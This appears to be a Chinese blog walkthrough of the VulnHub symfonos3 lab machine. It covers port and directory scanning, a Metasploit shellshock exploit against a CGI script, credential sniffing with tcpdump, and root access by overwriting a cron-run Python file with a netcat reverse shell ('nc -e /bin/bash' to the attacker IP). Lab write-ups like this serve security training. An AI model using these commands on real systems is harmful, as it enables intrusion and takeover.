本周实践的是vulnhub的symfonos3镜像,下载地址,https://download.vulnhub.com/symfonos/symfonos3v2.7z,
靶机启动就能看到地址,也就不用扫了,
进行端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.71,
ftp,ssh,web,就这几个服务,
对web服务继续目录爆破,sudo dirb http://192.168.137.71,
再用dirbuster对cgi-bin目录进一步爆破,
能看到有underworld子目录,
浏览器访问这个underworld子目录,这里猜测调用了shell命令,进一步怀疑是否有shellshock漏洞,
直接简单粗暴的上metasploit,搜索相关利用,search shellshock,
就用这个吧,use exploit/multi/http/apache_mod_cgi_bash_env_exec,
set RHOSTS 192.168.137.71,set TARGETURI /cgi-bin/underworld,
执行,拿到meterpreter shell,但不是root,需要想办法提权,
这里引入一个查找root权限运行程序的神器,pspy,下载地址,
https://github.com/DominicBreuker/pspy,咱们这里下载pspy32,
然后传到靶机,cd /tmp,upload /home/kali/pspy32,
转成shell,并进一步变成交互式的,
shell,python -c 'import pty;pty.spawn("/bin/bash")',
改执行权限并执行,chmod 777 pspy32,./pspy32,
看到一个ftpclient.py是root权限定时执行的程序,
发现当前账户没有操作ftpclient.py的权限,需要再找其它账户,
这里的思路是,在本地抓包,看看能否得到相关的信息,
cd /tmp,tcpdump -D,tcpdump -i lo -w file.pcap,
把抓包文件下载到外面查看,得到了hades/PTpZTfU4vxgzvRBE账户信息,
用这个账户信息直接ssh靶机,这回就有权限操作ftpclient.py了,
rm /opt/ftpclient/ftpclient.py,vi /opt/ftpclient/ftpclient.py,
import sys
import os
os.system("nc -e /bin/bash 192.168.137.83 1234")
在攻击机上开个监听,nc -lvp 1234,等一会儿就能拿到新的shell了,
至此成功拿到root权限。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论